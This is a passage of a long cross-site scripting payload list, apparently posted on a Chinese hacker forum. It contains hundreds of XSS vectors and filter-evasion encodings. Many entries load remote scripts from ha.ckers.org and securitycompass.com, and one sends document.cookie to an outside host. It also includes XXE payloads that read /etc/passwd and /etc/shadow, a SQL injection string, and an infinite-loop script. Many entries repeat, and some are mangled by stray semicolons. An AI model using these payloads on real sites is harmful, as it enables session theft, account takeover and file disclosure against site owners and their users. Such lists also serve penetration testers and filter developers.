  1237. <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
  1238. <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  1239. <a href="javascript#document.vulnerable=true;">
  1240. <div onmouseover="document.vulnerable=true;">
  1241. <img src="javascript:document.vulnerable=true;">
  1242. <img dynsrc="javascript:document.vulnerable=true;">
  1243. <input type="image" dynsrc="javascript:document.vulnerable=true;">
  1244. <bgsound src="javascript:document.vulnerable=true;">
  1245. &<script>document.vulnerable=true;</script>
  1246. &{document.vulnerable=true;};
  1247. <img src=&{document.vulnerable=true;};>
  1248. <link rel="stylesheet" href="javascript:document.vulnerable=true;">
  1249. <iframe src="vbscript:document.vulnerable=true;">
  1250. <img src="mocha:document.vulnerable=true;">
  1251. <img src="livescript:document.vulnerable=true;">
  1252. <a href="about:<script>document.vulnerable=true;</script>">
  1253. <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
  1254. <body onload="document.vulnerable=true;">
  1255. <div style="background-image: url(javascript:document.vulnerable=true;);">
  1256. <div style="behaviour: url([link to code]);">
  1257. <div style="binding: url([link to code]);">
  1258. <div style="width: expression(document.vulnerable=true;);">
  1259. <style type="text/javascript">document.vulnerable=true;</style>
  1260. <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
  1261. <style><!--</style><script>document.vulnerable=true;//--></script>
  1262. <<script>document.vulnerable=true;</script>
  1263. <![<!--]]<script>document.vulnerable=true;//--></script>
  1264. <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
  1265. <img src="blah"onmouseover="document.vulnerable=true;">
  1266. <img src="blah>" onmouseover="document.vulnerable=true;">
  1267. <xml src="javascript:document.vulnerable=true;">
  1268. <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  1269. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1270. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  1271. <style>@import'http://www.securitycompass.com/xss.css';</style>
  1272. <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
  1273. <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  1274. <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
  1275. <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
  1276. <script SRC="http://www.securitycompass.com/xss.jpg"></script>
  1277. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1278. <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
  1279. <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
  1280. <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
  1281. <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
  1282. <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
  1283. <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
  1284. <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
  1285. <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1286. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  1287. </script><script>alert(1)</script>
  1288. </br style=a:expression(alert())>
  1289. <scrscriptipt>alert(1)</scrscriptipt>
  1290. <br size="&{alert('XSS')}">
  1291. perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out
  1292. perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
  1293. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1294. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
  1295. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1296. <~/XSS STYLE=xss:expression(alert('XSS'))>
  1297. "><script>alert('XSS')</script>
  1298. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1299. XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1300. XSS STYLE=xss:e/**/xpression(alert('XSS'))>
  1301. </XSS STYLE=xss:expression(alert('XSS'))>
  1302. ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  1303. ';';;!--";<;XSS>;=&;{()}
  1304. <;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
  1305. <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
  1306. <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  1307. <;BASE HREF=";javascript:alert(';XSS';);//";>;
  1308. <;BGSOUND SRC=";javascript:alert(';XSS';);";>;
  1309. <;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
  1310. <;BODY ONLOAD=alert(';XSS';)>;
  1311. <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
  1312. <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
  1313. <;DIV STYLE=";width: expression(alert(';XSS';));";>;
  1314. <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
  1315. <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
  1316. <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
  1317. <;IMG SRC=";javascript:alert(';XSS';);";>;
  1318. <;IMG SRC=javascript:alert(';XSS';)>;
  1319. <;IMG DYNSRC=";javascript:alert(';XSS';);";>;
  1320. <;IMG LOWSRC=";javascript:alert(';XSS';);";>;
  1321. <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
  1322. Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
  1323. exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
  1324. <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS
  1325. <;IMG SRC=';vbscript:msgbox(";XSS";)';>;
  1326. <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
  1327. <;IMG SRC=";livescript:[code]";>;
  1328. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1329. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
  1330. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
  1331. <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
  1332. <;IMG SRC=";mocha:[code]";>;
  1333. <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
  1334. <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
  1335. <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
  1336. a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;
  1337. eval(a+b+c+d);
  1338. <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
  1339. <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
  1340. <;XSS STYLE=";xss:expression(alert(';XSS';))";>;
  1341. <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  1342. <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
  1343. <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
  1344. <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
  1345. <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
  1346. <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
  1347. <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
  1348. <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
  1349. <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
  1350. <;HTML xmlns:xss>;
  1351. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
  1352. <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
  1353. <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
  1354. <;HTML>;<;BODY>;
  1355. <;!--[if gte IE 4]>;           
  1356. <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
  1357. <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
  1358. <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
  1359. <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
  1360. <;? echo(';<;SCR)';;
  1361. <;BR SIZE=";&;{alert(';XSS';)}";>;
  1362. <;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
  1363. <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
  1364. <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
  1365. <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
  1366. <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
  1367. <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
  1368. <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
  1369. <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
  1370. <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
  1371. ";;alert(';XSS';);//
  1372. <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
  1373. <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
  1374. <;IMG SRC=";jav        ascript:alert(';XSS';);";>;
  1375. <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
  1376. <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
  1377. <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
  1378. <;IMG
  1379. SRC
  1380. =
  1381. ";
  1382. j
  1383. a
  1384. v
  1385. a
  1386. s
  1387. c
  1388. r
  1389. i
  1390. p
  1391. t
  1392. :
  1393. a
  1394. l
  1395. e
  1396. r
  1397. t

  1398. ';
  1399. X
  1400. S
  1401. S
  1402. ';
  1403. )
  1404. ";
  1405. >;
  1406. perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
  1407. perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
  1408. <;IMG SRC="; &;#14;  javascript:alert(';XSS';);";>;
  1409. <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1410. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
  1411. <;SCRIPT SRC=http://ha.ckers.org/xss.js
  1412. <;SCRIPT SRC=//ha.ckers.org/.j>;
  1413. <;IMG SRC=";javascript:alert(';XSS';)";
  1414. <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
  1415. <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
  1416. <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
  1417. <;SCRIPT>;a=/XSS/
  1418. <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1419. <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1420. <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1421. <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1422. <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1423. <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1424. <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1425. <;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
  1426. <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
  1427. <;A HREF=";http://1113982867/";>;XSS<;/A>;
  1428. <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
  1429. <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
  1430. <;A HREF=";h
  1431. tt        p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
  1432. <;A HREF=";//www.google.com/";>;XSS<;/A>;
  1433. <;A HREF=";//google";>;XSS<;/A>;
  1434. <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
  1435. <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
  1436. <;A HREF=";http://google.com/";>;XSS<;/A>;
  1437. <;A HREF=";http://www.google.com./";>;XSS<;/A>;
  1438. <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
  1439. <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
  1440. <script>document.vulnerable=true;</script>
  1441. <img SRC="jav ascript:document.vulnerable=true;">
  1442. <img SRC="javascript:document.vulnerable=true;">
  1443. <img SRC="  javascript:document.vulnerable=true;">
  1444. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1445. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  1446. <script <B>document.vulnerable=true;</script>
  1447. <img SRC="javascript:document.vulnerable=true;"
  1448. <iframe src="javascript:document.vulnerable=true; <
  1449. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  1450. ";document.vulnerable=true;;//
  1451. </title><SCRIPT>document.vulnerable=true;</script>
  1452. <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
  1453. <body BACKGROUND="javascript:document.vulnerable=true;">
  1454. <body ONLOAD=document.vulnerable=true;>
  1455. <img DYNSRC="javascript:document.vulnerable=true;">
  1456. <img LOWSRC="javascript:document.vulnerable=true;">
  1457. <bgsound SRC="javascript:document.vulnerable=true;">
  1458. <br SIZE="&{document.vulnerable=true}">
  1459. <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
  1460. <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
  1461. <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
  1462. <img SRC='vbscript:document.vulnerable=true;'>
  1463. 1script3document.vulnerable=true;1/script3
  1464. <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
  1465. <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
  1466. <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
  1467. <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
  1468. <table BACKGROUND="javascript:document.vulnerable=true;">
  1469. <table><TD BACKGROUND="javascript:document.vulnerable=true;">
  1470. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1471. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1472. <div STYLE="width: expression(document.vulnerable=true);">
  1473. <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
  1474. <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
  1475. <XSS STYLE="xss:expression(document.vulnerable=true)">
  1476. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
  1477. <style TYPE="text/javascript">document.vulnerable=true;</style>
  1478. <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
  1479. <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
  1480. <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
  1481. <base HREF="javascript:document.vulnerable=true;//">
  1482. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  1483. <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  1484. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
  1485. <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
  1486. <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
  1487. <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
  1488. <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  1489. <a href="javascript#document.vulnerable=true;">
  1490. <div onmouseover="document.vulnerable=true;">
  1491. <img src="javascript:document.vulnerable=true;">
  1492. <img dynsrc="javascript:document.vulnerable=true;">
  1493. <input type="image" dynsrc="javascript:document.vulnerable=true;">
  1494. <bgsound src="javascript:document.vulnerable=true;">
  1495. &<script>document.vulnerable=true;</script>
  1496. &{document.vulnerable=true;};
  1497. <img src=&{document.vulnerable=true;};>
  1498. <link rel="stylesheet" href="javascript:document.vulnerable=true;">
  1499. <iframe src="vbscript:document.vulnerable=true;">
  1500. <img src="mocha:document.vulnerable=true;">
  1501. <img src="livescript:document.vulnerable=true;">
  1502. <a href="about:<script>document.vulnerable=true;</script>">
  1503. <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
  1504. <body onload="document.vulnerable=true;">
  1505. <div style="background-image: url(javascript:document.vulnerable=true;);">
  1506. <div style="behaviour: url([link to code]);">
  1507. <div style="binding: url([link to code]);">
  1508. <div style="width: expression(document.vulnerable=true;);">
  1509. <style type="text/javascript">document.vulnerable=true;</style>
  1510. <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
  1511. <style><!--</style><script>document.vulnerable=true;//--></script>
  1512. <<script>document.vulnerable=true;</script>
  1513. <![<!--]]<script>document.vulnerable=true;//--></script>
  1514. <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
  1515. <img src="blah"onmouseover="document.vulnerable=true;">
  1516. <img src="blah>" onmouseover="document.vulnerable=true;">
  1517. <xml src="javascript:document.vulnerable=true;">
  1518. <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  1519. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1520. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  1521. <style>@import'http://www.securitycompass.com/xss.css';</style>
  1522. <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
  1523. <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  1524. <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
  1525. <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
  1526. <script SRC="http://www.securitycompass.com/xss.jpg"></script>
  1527. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1528. <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
  1529. <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
  1530. <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
  1531. <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
  1532. <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
  1533. <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
  1534. <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
  1535. <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1536. ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
  1537. <;/script>;<;script>;alert(1)<;/script>;
  1538. <;/br style=a:expression(alert())>;
  1539. <;scrscriptipt>;alert(1)<;/scrscriptipt>;
  1540. <;br size=";&;{alert('XSS')}";>;
  1541. perl -e 'print ";<;IMG SRC=java\0script:alert(";XSS";)>;";;' >; out
  1542. perl -e 'print ";<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;' >; out
  1543. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1544. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
  1545. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1546. <~/XSS STYLE=xss:expression(alert('XSS'))>
  1547. "><script>alert('XSS')</script>
  1548. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1549. XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1550. XSS STYLE=xss:e/**/xpression(alert('XSS'))>
  1551. </XSS STYLE=xss:expression(alert('XSS'))>
  1552. >"><script>alert("XSS")</script>&
  1553. "><STYLE>@import"javascript:alert('XSS')";</STYLE>
  1554. >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
  1555. >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
  1556. '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
  1557. ">
  1558. >"
  1559. '';!--"<XSS>=&{()}
  1560. <IMG SRC="javascript:alert('XSS');">
  1561. <IMG SRC=javascript:alert('XSS')>
  1562. <IMG SRC=JaVaScRiPt:alert('XSS')>
  1563. <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>
  1564. <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
  1565. <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>   
  1566. <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
  1567. <IMG SRC="jav
  1568. ascript:alert(<WBR>'XSS');">
  1569. <IMG SRC="jav
  1570. ascript:alert(<WBR>'XSS');">
  1571. <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
  1572. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  1573. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
  1574. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
  1575. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
  1576. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
  1577. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
  1578. <script>alert('XSS')</script>
  1579. %3cscript%3ealert('XSS')%3c/script%3e
  1580. %22%3e%3cscript%3ealert('XSS')%3c/script%3e
  1581. <IMG SRC="javascript:alert('XSS');">
  1582. <IMG SRC=javascript:alert("XSS")>
  1583. <IMG SRC=javascript:alert('XSS')>      
  1584. <img src=xss onerror=alert(1)>
  1585. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  1586. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  1587. <IMG SRC="jav ascript:alert('XSS');">
  1588. <IMG SRC="jav        ascript:alert('XSS');">
  1589. <IMG SRC=javascript:alert('XSS')>
  1590. <IMG SRC=javascript:alert('XSS')>
  1591. <IMG SRC=javascript:alert('XSS')>
  1592. <BODY BACKGROUND="javascript:alert('XSS')">
  1593. <BODY ONLOAD=alert('XSS')>
  1594. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  1595. <IMG SRC="javascript:alert('XSS')"
  1596. <iframe src=http://ha.ckers.org/scriptlet.html <


  1597. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1598. %253cscript%253ealert(1)%253c/script%253e
  1599. "><s"%2b"cript>alert(document.cookie)</script>
  1600. foo<script>alert(1)</script>
  1601. <scr<script>ipt>alert(1)</scr</script>ipt>



  1602. <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

  1603. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

  1604. <marquee onstart='javascript:alert('1');'>=(&#9685;_&#9685;)=



  1605. "><img src=x onerror=prompt(0)>

  1606. <iframe src="x-javascript:alert(document.domain);"></iframe>

  1607. <marquee><h1>XSS by xss</h1></marquee>

  1608. <script>-=alert;-(1)</script> "onmouseover="confirm(document.domain);"" </script>

  1609. <script>alert(2)</script> "><img src=x onerror=prompt(document.domain)>
复制代码

过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表